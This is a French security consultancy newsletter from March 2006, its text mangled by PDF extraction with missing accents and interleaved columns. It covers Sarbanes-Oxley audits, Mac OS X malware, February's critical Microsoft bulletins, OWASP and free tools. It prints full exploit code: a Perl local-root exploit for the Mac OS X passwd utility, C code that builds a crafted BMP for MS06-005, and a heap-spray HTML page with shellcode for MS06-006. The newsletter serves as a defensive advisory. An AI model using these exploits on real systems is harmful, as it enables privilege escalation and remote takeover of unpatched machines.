LA SCURIT INFORMATIQUE
MARS 2006
Lactu Scurit N1
PLAN
1 riche. Il devient mme impossible de
POINT JURIDIQUE
Prsentation des diffrents
points auditer lors dune mise
en conformit Sarbanes-Oxley.
2
NOUVELLE TENDANCE
Le systme dexploitation Mac
OS X dApple connait une po-
pularit grandissante et int-
resse les pirates informatiques.
3
ATTAQUES ET ALERTES
MAJEURES
Description et analyse des atta-
ques et menaces les plus impor-
tantes parues durant le mois de
Fvrier.
4
VOLUTION NORMES ET
STANDARDS
Le guide de dveloppement s-
curis des applications et des
services Web de lOWASP tente
de normaliser la scurisation des
applications Web.
5
OUTILS LIBRES
Dcouvrez et suivez les volu-
tions des outils libres les plus
utiles et efficaces.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
Une newsletter pas comme les autres...
Lactualit de la scurit est Jespre que cette newsletter
vous apportera les rponses aux
ne pas multiplier les sources din- questions que vous vous posez. Bien
formation et les interlocuteurs pour entendu, je vous invite nous faire
essayer dy voir clair. Quant penser part de vos commentaires, et des
que certains acteurs ont tout ga- ventuels points que vous souhaite-
gner entretenir cette confusion... riez voir abords, afin de combler
Depuis 2002, nous avons dlib- vos attentes.
rment choisi dtre un cabinet diff- Je profite de cette tribune pour
rent, anim par une volont mar- remercier mon quipe de consultants
que de dlivrer un service de qua- pour leur motivation, leur expertise
lit, ractif, fiable et surtout transpa- et la rigueur dont ils font preuve
rent. quotidiennement pour vous satis-
Notre ractivit nous a dailleurs faire.
permis de gagner la confiance de
nos clients, en nous concentrant sur A bientt.
la rsolution de leurs problmes,
plutt que sur les dtails administra-
tifs qui agacent.
Plusieurs clients nous ont de-
mand de complter notre service de
veille scurit quotidienne, par une
synthse au sein de laquelle nous
pourrions aborder ce qui nous parait
essentiel.
Vous retrouverez donc chaque
mois les rubriques suivantes : Point
Juridique, Nouvelles Tendances,
Attaques et Alertes Majeures, Evo-
lutions Normes et Standards, Outils
libres.
Pour le premier numro de
notre newsletter, nous avons dcid
daborder la loi Sarbanes-Oxley :
avez-vous dj essay de trouver sur
Marc Behar
Internet un modle de questionnaire
Sarbanes-Oxley ? trop peu dinfor-
mations sont disponibles...
1
 LA SCURIT INFORMATIQUE
1. POINT JURIDI-
QUE:
SARBANES-OXLEY
Cette loi fut vote en juillet 2002 par le
Congrs Amricain puis ratifie par le
prsident Bush le 30 du mme mois.
Lapplication de cette loi entre en
vigueur pour toutes les entreprises
amricaines cotes au NASDAQ ainsi
que leurs filiales ltranger.
Chacune dentre elle doit certifier leurs
comptes auprs de la Securities and
Exchanges Commission (SEC) l'orga-
nisme de rgulation des marchs
financiers US.
Plusieurs points sont tudis et doivent
faire lobjet de tests prcis. Une dizaine
de catgories sont prises en compte.
La gestion des mots de passe
Un audit concerne plu-
sieurs critres:
Le niveau de scurit des mots de
passe.
La vrification du changement des
mots de passe tous les six mois.
Ltude des notes dlivres par le
responsable scurit aux employs
sur la politique des choix de mots
de passe.
Un exemple concret de test consiste-
rait valuer la scurit des mots de
passe de 30 utilisateurs, et identi-
fier la proportion de mots de passe
faibles.
Etude de rseau informatique
La seconde partie con-
cerne le rseau informati-
que. Plusieurs points sont
tudier:
Vrificationde lauthentification
des accs VPN.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
Utilisation des serveurs DHCP
avec rservation dIP en fonction
de ladresse MAC afin dinterdire
laccs aux machines trangres au
rseau.
Protection du rseau interne par 2
niveaux de pare-feux.
Contrle et journalisation des
accs Internet.
Signature dune charte de bon
usage dInternet.
Authentification des utilisateurs
pour accder Internet.
Rvocation des certificats lors du
dpart des collaborateurs.
Filtrage des emails vis--vis des
menaces connues: virus, chevaux
de Troie, etc.
Gestion des antivirus et des correctifs
Effectuer un filtrage effi-
cace sur les serveurs de
mails afin dviter toute
propagation de vers et de
fichiers malicieux sur le
rseau internes.
Analyse virale de tous les messages
qui transitent par le serveur SMTP.
un contrle des mises jour doit
tre effectu chaque mois par un
responsable informatique.
MARS 2006
Plan de reprise en cas de dsastres
Cet aspect a pour objectif
dvaluer les capacits de
lentreprise faire face
un incident grave.
Sauvegarde des serveurs princi-
paux.
Externalisation des supports de
sauvegarde.
Rdaction dun document de
procdure de restauration pour
chaque serveur.
Applications ERP
La scurit des ERPs
constitue un point cl de
la loi Sarbanes-Oxley.
Contrles stricts de laccs : attri-
bution de droits aux utilisateurs
des diffrentes ressources.
Utilisation de mots de passe longs
et une authentification tablie
toutes les 15 minutes lorsque lap-
plication nest pas utilise.
Accessibilit des donnes seule-
ment aux utilisateurs autoriss.
2
 LA SCURIT INFORMATIQUE
MARS 2006

Gestion des ordinateurs portables

Spcification dune politique de scurit
stricte pour les ordinateurs portables. Il
est ncessaire de prendre des mesures
prcises afin dviter toute perte et vol
de donnes ou linfection du rseau par
des virus.

Prsence dun pare-feu personnel sur chaque ordina-

teur portable.
Activation par dfaut de lexcution des mises jour des
anti-virus, des logiciels divers et du systme dexploita-
tion.

Les sauvegardes
Des mesures de sauvegardes continues.

Sauvegarde des serveurs et des postes sensibles.

Spcification de la dure de rtention des sauvegardes
en fonction de chaque entreprise.
Ralisationde tests de restauration tous les quatre six
mois.

Journalisation & Audits

Mener des audits internes afin dassurer
le bon fonctionnement des mesures de
scurit prises par lentreprise.
Vrification de lexistence des fichiers de logs des ser-
veurs mails, des navigateurs internet, des accs VPN
Traabilit des accs aux applications financires et
ressources humaines.
Sauvegardes des emails conserves durant 1 mois mi-
nimum (destinataire, lenvoyeur, le sujet, la date et
lheure et lIP).
Vulnrabilits
Raliser des tests de vulnrabilits cha-
que mois sur les serveurs critiques, as-
sortis. de rapports crits par les respon-
sables de la scurit.
Scurit physique
Rglementer de manire stricte laccs
aux btiments et aux ressources infor-
matiques.
Contrle et restriction des accs aux diffrentes zones
de lentreprise via un systme de contrle.
Passage obligatoire des visiteurs par laccueil pour tre
enregistrs.
Protection des salles des serveurs informatiques par un
lecteur de badges.
Scurit des btiments
Protger les btiments contre les incen-
dies et scuriser les flux afin dviter les
vols de donnes.

Affichage du plans dvacuation chaque tage.

Ralisation dun test dvacuation durgence une fois
par an.
Prsence dalarmes incendies ainsi que de portes anti-
feu dans chaque btiment.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 3

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

2. NOUVELLE TENDANCE :
MAC OS X EST VULNRABLE

Le mois de fvrier aura t marqu par lapparition des pre-

miers virus et exploits Mac OS et un correctif de plus de 20
vulnrabilits a t publi par Apple.
Apple commence donc prendre conscience de lexploitation
potentielle de failles et virus pour son systme dexploitation
Mac OS X.

De nombreux programmes malveillants destins au systme

dexploitation Mac OS X dApple ont t publis durant le mois
de Fvrier. Parmi ces programmes, il existe des preuves de con-
cept de virus et de ver ainsi que des programmes qui permet-
tent dexcuter des commandes arbitraires sur des systmes
vulnrables.

Elvation de privilges en local #!/usr/bin/perl

Erreur de conception de lutili- #
taire passwd use POSIX;

Un programme malicieux visant la plate-forme Mac OS
X a t publi le 28 Fvrier 2006. Ce programme permet
un utilisateur local dexcuter des commandes arbitrai-
res dans le contexte du super-utilisateur root sur un
systme vulnrable.
Le problme rsulte dune erreur de conception de luti-
litaire passwd du systme dApple. En effet, il est possi-
ble de passer au programme incrimin un fichier alatoire
en paramtre sans que celui ci ne soit valid.
Un utilisateur local malveillant devient donc en mesure
d'lever ses privilges en passant un fichier passwd judi-
cieusement conu au programme impact.
Le programme expos ci-contre permet d'effectuer faci-
lement ces manipulations frauduleuses.
$fake_passwd="/tmp/xpasswd.$$";
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";
sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/real-
halo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to
$fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid .
"::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't
link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 charac-
ters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL
ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user)
password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

exploit MAC OS X - passwd

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 4

www.xmcopartners.com
 LA SCURIT INFORMATIQUE
Excution distance de codes arbitraires
Firefox ne gre pas correctement
les pages HTML contenant un pa-
ramtre Content File excessi-
vement long.
Un programme malicieux qui exploite une faille du pro-
duit Firefox de Mozilla a t rendu public. Un attaquant
hbergeant des pages HTML malicieuses, gnres par
cet exploit, est en mesure d'excuter des commandes ar-
bitraires sur un systme vulnrable.
En effet, le paramtre Content File de ces pages
HTML correspond une chane de caractres excessive-
ment longue.
Si un utilisateur d'une machine vulnrable tente de visua-
liser une de ces pages, un dbordement de pile pourrait
avoir lieu. Il donnerait ainsi la possibilit d'excuter des
commandes arbitraires.
Excution distance de codes arbitraires
Safari excute automatiquement
les fichiers contenus dans les ar-
chives ZIP tlcharges.
Un programme malicieux qui exploite une faille de scu-
rit du systme d'exploitation Mac OS X a t publi.
Cette preuve de concept permet a un attaquant distant
d'excuter des scripts shell sur un systme Mac OS X
vulnrable de manire automatique.
Le problme rsulte d'une faille de conception du navi-
gateur Internet Safari. En effet, le produit de Apple d-
compresse automatiquement les archives zip et lance le
programme correspondant au fichier dcompress sans
demander de confirmation lutilisateur. Dans le cas o le
fichier dcompress est un script shell, celui-ci est excut
automatiquement dans un terminal avec les droits de
lutilisateur abus.
Un attaquant distant peut inciter une victime tlchar-
ger une archive contenant un script shell judicieusement
forg afin d'excuter automatiquement des commandes
arbitraire sur un systme vulnrable.
Le code de cette preuve de concept est le suivant :
# /bin/bash
while true; do
echo "Hallo Welt!"
done
exploit MAC OS X - Safari
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
MARS 2006
Premier virus pour la plate-forme Mac OS X
Publication dun ver se propa-
geant laide dune faille du pro-
duit iChat.
Le premier virus qui vise la plate-forme Mac OS X vient
d'tre identifi. Ce programme est une preuve de concept
et neffectue aucune action malveillante.
Ce code se propage de manire autonome via le rseau de
messagerie instantane iChat. Aprs avoir infect une
machine, le ver senvoie toutes les listes dutilisateurs
prsentes sur la machine.
Ce ver est galement diffus par le biais demails propo-
sant les toutes premires captures dcran de la nouvelle
mouture d Apple Mac OS X Leopard.
Notons que si les liens malicieux proposs, dans les fen-
tres de discussion iChat ou dans les emails malveillants, ne
sont pas suivis aucune infection naura lieu.
De plus, ce programme bien quinoffensif prouve que des
vers et virus pour Mac OS X, peuvent tre dvelopps.
Second virus pour Mac OS X
Prog ramme malicieux qui exploite
une faille de la gestion des con-
nexions Bluetooth.
Suite a la publication du premier virus visant la plate-
forme Mac OS X, OSX/Leap.A, un second virus
OSX/Inqtana.A a t dtect sur Internet.
Alors que le premier virus se diffusait automatiquement
sur les rseaux de messagerie instantane aim et les emails
malicieux, le second a choisit les ports Bluetooth comme
vecteur de diffusion.
Ce second virus ne semble pas offensif, mais ouvre dfini-
tivement la voie du dveloppement de code malicieux
pour la plate-forme MacOS X jusqu' lors inexplore.
5
 LA SCURIT INFORMATIQUE
MARS 2006

Aprs, tous les chos svrement relays par la presse, les

aficionados ne doivent pas cds la psychose. En effet,
les dveloppeurs dApple ont toujours rpondu efficace-
ment et rapidement aux vulnrabilits dcouvertes. En
comparaison Microsoft qui publie de nouveaux correc-
tifs chaque second mardi du mois, ce qui laisse quelques
jours aux pirates pour tenter dexploiter ces failles, Apple
se distingue par sa ractivit.

Le succs du systme dexploitation se devait de passer

par cette priode critique qui, on lespre, ne nuira pas
son image de marque

La scurit du systme dexploitation Mac OS X remis en

question
Mac OS X nest pas impermable
aux attaques des pirates infor-
matiques

En effet, la dcouverte de failles et de virus en tout genre

remet en question la scurit de Mac OS X. Ce systme a
longtemps t considr tort par ses utilisateurs comme
invincible et impermable toute attaque informatique.
La robustesse apparente de ce systme semble tre lie au
fait que celui-ci ntait que trs peu rpandu. En effet, les
pirates informatiques sont principalement motivs par
lappt du gain et jusqu ce jour la communaut dutili-
sateur Mac OS X ne reprsentait pas une cible suffisam-
ment importante. Aujourdhui, la ralit est tout autre.
Un engouement grandissant pour ce systme le place
dans la catgorie des cibles conomiquement viables.

Aprs les quelques programmes malveillants pionniers qui

ont ouvert la voie aux pirates, la publication, de nouvelles
vulnrabilits ainsi que de nouveaux exploits Mac OS X,
est devenue quasi quotidienne. Lanne 2006 sera sans
doute lanne dexploitation du systme dApple. Les
rgles dusage distilles auprs des utilisateurs de systmes
exposs depuis plus longtemps aux assauts des pirates
devront galement tre suivies par les utilisateurs de sys-
tmes Macintosh. En effet, sous prtexte quil nexistait
pas de virus ou exploit visant les plateformes Apple, les
utilisateurs de ces systmes boudaient quelque peu les
rgles qui restent plus que jamais dactualit savoir:
Mise jour rgulire du systme dexploitation
Mise jour rgulire du logiciel antivirus
Ne pas excuter de programmes dont la provenance
est douteuse
Ne pas ouvrir demail dexpditeur inconnu
Ne pas faire confiance un site Internet dorigine
douteuse

Un systme nest jamais totalement sr, tout OS possde

des failles de scurit. Lexploitation de celles-ci doit tre
limite au maximum par la mise en pratique de bonne
rgles dutilisation des systmes dinformation.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 6

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

3. ATTAQUES MAJEURES :
TOP 5 DU MOIS DE FVRIER

Le mois de fvrier a t marqu par la publication de 2

failles critiques de la plate-forme Windows et de leur ex-
ploit respectif ainsi que la parution des premiers pro-
grammes malveillants visant la plate-forme Mac OS X.

XMCO | Partners

Microsoft a publi 7 correctifs le 14 Fvrier 2006,

parmi ceux-ci nous pouvions identifier deux bulletins
critiques et 5 importants. Les 3 failles les plus critiques
concernaient les composants Internet Explorer et Win-
dows Media Player.
MS06-005
Excution de code arbitraire avec
Windows Media Player
Les vecteurs dexploitation de cette faille de scurit sont
nombreux. Lattaquant peut crer un fichier .asx et
soumettre la victime lURL qui pointe vers ce fichier via
un email malveillant. Il peut galement envoyer directe-
ment le fichier .bmp malform en pice jointe dun
email malicieux et inciter la victime louvrir avec WMP.
Lutilisation dune page HTML contenant des ActiveX
malicieux est galement envisageable et enfin en soumet-
tant la victime un skin contrefait pour Windows Media
Player.

La premire faille critique concerne le logiciel Windows Dans tous les cas, lintervention de lutilisateur est indis-
Media Player et est corrige avec lapplication du correctif pensable et lattaquant devra possder un serveur idoine
MS06-005. (SMTP, HTTP, FTP etc).

Microsoft corrige une faille de scurit de son lecteur Un programme malveillant est sorti quelques heures aprs
multimdia Windows Media Player. En effet, le lecteur la publication du correctif.
multimdia de Microsoft souffrait dun dbordement de Le code de cet exploit (voir page suivante) provoque un
tas survenant lors de la lecture de certains fichiers image dbordement de tampon et pourrait tre complt afin de
.bmp malforms. Cette erreur dimplmentation pou- permettre lexcution de code arbitraire (installation de
vait tre exploite par des attaquants distants afin dex- troyens, virus)
cuter des commandes arbitraires sur un systme vulnra-
ble.

Pour cela, le pirate devait, au pralable, contrefaire un

fichier image .bmp en dclarant une taille de fichier
nulle. Si la victime tentait douvrir le fichier malicieux
laide de son lecteur Windows Media Player vulnrable ce
dernier allouerait un tampon mmoire de taille 0 et
tenterait de copier le fichier dans ce tampon mmoire
causant ainsi un dbordement de tas.

Ce dbordement de tas permet lattaquant dexcuter le

code malicieux embarqu au sein du fichier BMP.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 7

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

#include <windows.h>
#include <stdio.h> bmp_iheader->biClrUsed = 0x00;
#define BITMAP_FILE_SIZE 0xA8D2 bmp_iheader->biClrImportant = 0x00;
#define BITMAP_FILE_NAME "crafted.bmp" memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER)
#pragma pack( push ) );
#pragma pack( 1 ) memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_ihead
typedef struct _BitmapFileHeader { er,sizeof(BMPIHEADER));
WORD bfType; fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
DWORD bfSize; fwrite("\x00", 1,1, File); //Terminator
WORD bfReserved1; fclose(File);
WORD bfReserved2; printf("\n\n" BITMAP_FILE_NAME" has been created in
DWORD bfOffBits; the current directory.\n");
} BMPFHEADER; return 1;
typedef struct _BitmapInfoHeader{ }
DWORD biSize;
LONG biWidth;
LONG biHeight; exploit MS06-005
WORD biPlanes;
WORD biBitCount; MS06-006
DWORD biCompression;
DWORD biSizeImage; Excution de code arbitraire
LONG biXPelsPerMeter; distance avec des balises EMBED
LONG biYPelsPerMeter;
DWORD biClrUsed;
malformes.
DWORD biClrImportant;
} BMPIHEADER; Microsoft a corrig une vulnrabilit qui permettait un
#pragma pack( pop ) attaquant distant dexcuter des commandes arbitraires
sur un systme vulnrable, voir de prendre le contrle
int main(void) total de la machine cible.
{
FILE *File; Le problme rsulte dune mauvaise gestion de balises
BMPFHEADER *bmp_fheader;
BMPIHEADER *bmp_iheader;
EMBED du plugin Windows Media Player. Les tags EM-
char *pszBuffer; BED sont des balises HTML qui permettent dinclure des
plug-ins et des lecteurs dans les pages web.
printf("\nWindows Media Player BMP Heap Overflow
(MS06-005)"); La vulnrabilit exploite se manifeste lorsquun lment
printf("\nBug discovered by eEye"); embed src excessivement long est insr dans une page
printf("\nExploit coded by ATmaCA"); HTML malicieuse. Lors du traitement de cette balise par
printf("\nWeb: http://www.spyinstructors.com && le plugin Windows Media Player, une erreur de type d-
http://www.atmacasoft.com"); bordement de tampon se produit.
printf("\nE-Mail: atmaca@icqmail.com"); Lattaquant peut ainsi excuter du code distance lorsque
printf("\nCredit to Kozan");
if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) ==
la victime visite le site web pirate.
NULL ) {
printf("\n [E:] fopen()"); Seuls les navigateurs autres quInternet Explorer sont
exit(1); affects par cette vulnrabilit (Firefox, Opera,
} Netscape). Il faut donc que la victime utilise un de ces
bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHE navigateurs et que Windows Media Player soit install sur
ADER)); la machine cible.
bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEA Il est important de noter que les consquences de latta-
DER)); que dpendent des droits de la victime.
pszBuffer = (char*)malloc(BITMAP_FILE_SIZE); Le pirate pourrait prendre le contrle total de la machine
memset(pszBuffer,0x41,BITMAP_FILE_SIZE);
bmp_fheader->bfType = 0x4D42; // "BM"
vulnrable si lutilisateur est authentifi en tant quadmi-
bmp_fheader->bfSize = BITMAP_FILE_SIZE; nistrateur.
bmp_fheader->bfReserved1 = 0x00; De plus, lintervention dun utilisateur est indispensable.
bmp_fheader->bfReserved2 = 0x00; Effectivement, lutilisateur cibl ne risque rien tant quil
bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEA- na pas visit le site web pirate.
DER) + sizeof(BMPIHEADER) );
bmp_iheader->biSize = 0x28; Ces programmes exploitent la faille MS06-006 corrige
bmp_iheader->biWidth = 0x91; rcemment par Microsoft. Un utilisateur distant est en
bmp_iheader->biHeight = 0x63; mesure d'utiliser ces programmes afin d'excuter des
bmp_iheader->biPlanes = 0x01; commandes arbitraires sur un systme qui demeure non
bmp_iheader->biBitCount = 0x18;
bmp_iheader->biCompression = 0x00;
corrige.
bmp_iheader->biSizeImage = 0xA89C;
bmp_iheader->biXPelsPerMeter = 0x00;
bmp_iheader->biYPelsPerMeter = 0x00;

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 8

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

<HTML>
<HEAD>
Le premier programme se prsente sous forme d'une page <TITLE>WMP Plugin EMBED Exploit</
HTML contenant des balises <EMBED> judicieusement TITLE>
malformes. Ce programme a t test avec succs sur <SCRIPT>
une machine Windows XP SP2 implmentant Windows var spray =
Media Player 10 et Firefox 1.5.0.1. Cet exploit permet de unescape("%u4141%u4141%u4141%u4141%u4
se loguer en local en tant quadministrateur avec le nom 141%u4141%u4141%u4141");
dutilisateur wmp0wn3d et le mode de passe pass- do {
word. spray += spray;
Vous trouverez le code de cette page la fin de cette } while (spray.length < 0x1000000);
description.
spray += unescape(
Le second programme est un module du produit Metas- "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4
ploit. Il permet exploiter la faille sur des machines vuln- %u7381%u9713"+
rables implmentant la version 9 du produit incrimine. "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d
%u8c97%udef2"+
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2
%u8db7%ud292"+
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9
%u4d90%u96b3"+
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2
%u8db3%ufd92"+
"%u801c%u1032%u90c8%u7078%u901c%u9af2
%u057c%ubf25"+
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701
%ucc1c%u1075"+
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9
%u8c97%uf3f2"+
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02
%u7cff%u9ff3"+
"%ue4c8%u65e1%u821d%u642e%uef70%uff14
%ue9b9%ufe01"+
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c
%ufbb7%ueb14"+
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e
%ue8e5%ub459"+
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759
%ueff8%uf718"+
"%ufef0%uee16%uace7%uff38%ue5fa%uf217
%uf8e4%ufa0b"+
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817
%uacf3%uda56"+
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="<2038 fois ->
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJ
JJJKKKKLLLLAAANNNNOOOO
AAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYY
YYZZZZ0000111122223333444455556666
777788889999.wmv"></EMBED>
</BODY>
</HTML>
exploit MS06-006

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 9

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

MS06-004
Correctif cumulatif critique pour Erreur de conception de Safari
Internet Explorer sur Windows Excution automatique de script
2000. shell sur les systmes Mac OS X.
La seconde faille critique de Microsoft pour le mois de
Un exploit paru le 21 fvrier 2006 permettait un atta-
fvrier 2006 est un correctif cumulatif pour Internet Ex-
quant distant d'excuter des scripts Shell sur un systme
plorer, c'est dire que ce correctif corrige galement les
Mac OS X vulnrable de manire automatique.
failles publies depuis le MS04-004 et le MS04-038.
Le problme rsulte d'une faille de conception du navi-
Ce correctif cible uniquement les versions 5.1 d'Internet
gateur Internet Safari. En effet, le produit dApple d-
Explorer sur les machines Windows 2000 SP4 et corrige
compresse automatiquement les archives zip et lance le
une nouvelle faille lie aux fichiers image .wmf au sein
programme correspondant au fichier dcompress. Dans
desquels il est possible de cacher un programme mali-
le cas o le fichier dcompress est un script Shell celui-ci
cieux.
est excut automatiquement dans un terminal.
Un attaquant distant peut inciter une victime tlchar-
Le problme est d la gestion des images WMF (Win-
ger une archive contenant un script Shell judicieusement
dows Metafile). Lors de lexcution de fichiers malforms,
forg afin d'excuter automatiquement des commandes
Internet Explorer peut corrompre la mmoire systme ce
arbitraires sur un systme vulnrable.
qui peut tre alors exploit par un attaquant afin dex-
cuter du code sur le poste victime.
En dautres termes, le pirate va crer un script dextension
.sh, contenant le code malicieux, qui sera excut sur
Pour pouvoir raliser une telle attaque, lutilisateur mal-
la machine cible.
intentionn doit inciter un utilisateur visiter un site web
La preuve de concept utilise une simple boucle qui affiche
malicieux afin de lancer lexcution dun fichier MF mal-
form. indfiniment une chane de caractres. La capture dcran
Il peut galement envoyer ce fichier par pice jointe dans que vous trouverez la fin de cette description corres-
pond lutilisation quelque peu modifie de la preuve de
un courriel.
concept et permet de lancer la calculatrice. Vous pouvez
Un point important est prciser : le fait de filtrer les facilement imaginer les possibilits dutilisation de cet
fichiers comportant lextension .wmf ne suffit pas. exploit.
Windows ne dtermine pas le type de fichier en fonction
de son extension, il reconnat le type grce au magic- while true; do
number du fichier. echo " Hallo Welt!"
De plus, lintervention dun utilisateur est indispensable. done

Actuellement, aucun programme malveillant qui exploite MAC OS X - preuve de concept Safari
cette vulnrabilit nest disponible sur Internet.
Ce script Shell sera renomm en un type excutable di-
Plusieurs rgressions fonctionnelles sont prvoir. Ces rectement avec Safari (fichier vido par exemple) et int-
dernires sont dues au fait que le correctif ajoute les an- grer dans une archive dextension .zip.
ciens MS04-004 et MS04-038 qui contenaient lesdites Le pirate va inciter sa victime visiter un lien comme
rgressions : celui-ci:
http://www.sitepirate.com/funny.mov.zip
KB884487 [1] : Lecteur "chapitre par chapitre" impossi-
ble avec le DVD Haute-Dfinition et Windows Media Le navigateur va donc extraire directement le fichier
P l a y e r . contenu dans larchive car lextension ne comporte prio-
KB909889 [2] : Certains contrles ActiveX peuvent ne ri aucune menace potentielle (.mov).
pas se charger correctement.
KB896688 [3] : Rgression due a l'ajout de MS05-052.
Certains ActiveX "maison" peuvent ne plus se charger.
Pour corriger cela, il faut ajouter le site dans les sites de
confiance et autoriser les ActiveX non signs.

Aucun exploit na t publi et cette vulnrabilit malgr

le niveau lev dfini par lditeur ne cible quun troit
primtre. Linstallation de la version 6 dInternet Explo-
rer rsout le problme.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 10

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

Ce dernier ne reconnatra pas le fichier (qui nest pas rellement un fichier vido) et donc lancera lexcution du script
Shell.

1. Clic sur un simple lien

2. Dcompression du fichier
3. Excution du code prsent dans le fichier zip
4. Lancement de la calculatrice

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 11

www.xmcopartners.com
 LA SCURIT INFORMATIQUE
4. EVOLUTION
DE NORMES :
OWASP
Lowasp, rfrence mondiale des
consultants en scurit informati-
que, est un organisme qui a pour
objectif daccompagner les dve-
loppeurs dans la scurisation de
leurs applications WEB. Nous vous
prsentons donc ce groupe ainsi
que ses actions.
XMCO | Partners
Open Web application Security
Project
LOWASP veut nor-
maliser le dvelop-
pement scuris
dapplications et ser-
vices WEB.
La scurit des applications se ba-
sent sur les normes ISO ainsi que
sur des projets lancs par des grou-
pes afin daider les dveloppeurs et
les entreprises scuriser leur dve-
loppement logiciel.
Un exemple est lOWASP (Open
Web Application Security Project),
organisme ddi rechercher et
combattre les causes de linscurit
logicielle.
LOWASP fait autorit parmi les
cabinets de conseil en scurit in-
formatique.
Ce groupe, constitu de bnvoles
volontaires pour la plupart anglo-
phones, produit rgulirement des
documents open-source, des outils et
des standards sur la scurit des
applications web.
Des confrences, articles et forums
sont proposs et leur participation
est gratuite et ouverte tous.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
MARS 2006
Tous les points ncessaires la scu-
De nombreux experts partagent risation dapplication web sont
donc leur point de vue et leur exp- abords et tendent devenir une
rience afin de faire voluer la scu- rfrence dans le monde de la scu-
rit. rit informatique.
Sur le site web www.owasp.com de
nombreux White Papers sont
disponibles.
Des documents tel que A guide to
building Secure Web Applications
and Web Services permettent aux
dveloppeurs de connatre les bon-
nes mthodes de scurisation des
applications. Ce guide publi dans
plusieurs langues tend devenir le
standard pour le dveloppement
dapplication web.
De nombreux sujets sont traits afin
de sensibiliser le lecteur avec des
exemples techniques.
Le Phishing, les services web, lau-
thentification, les autorisations, la
gestion des sessions, la validation des
donnes, les injections de codes, la
cryptographie, la gestion des interfa-
ces administratives, les dborde-
ments de tampon sont entre autres
traits. Des explications techniques
aident comprendre lobjet de ces
menaces et fournissent des solutions
concrtes.
12
 LA SCURIT INFORMATIQUE
MARS 2006

5. OUTILS LIBRES :
FOCUS SUR 5 PRODUITS LIBRES

Chaque mois, nous vous prsenterons les

outils libres qui nous paraissent indispensa-
bles. Les logiciels abords seront varis: utili-
taire de scurit et autres programmes nces-
saires au sein dune entreprise.
Pour notre premier numro, nous avons choisi
danalyser des programmes connus du grand
public et cependant peu utiliss dans les en-
treprise:
Debian : Clbre distribution Linux,
connue pour sa fiabilit
Snort : Outil de dtection dintrusion
trs performant
MySQL : Base de donnes, utilise par
de nombreux grands comptes: Yahoo,
Alcatel, la NASA
Apache: Clbre serveur web dont la
rputation nest plus faire
Nmap : Utilitaire de scan de ports,
utilis par les pirates et les administra-
teurs rseau afin de scuris leur sys-
tme

Nous maintiendrons un tableau rcapitulatif

des nouvelles versions disponibles de tous les
logiciels prsentes au fils du numro dAc-
tu. Scurit

XMCO |Partners

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 13

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

Debian
Distribution Linux
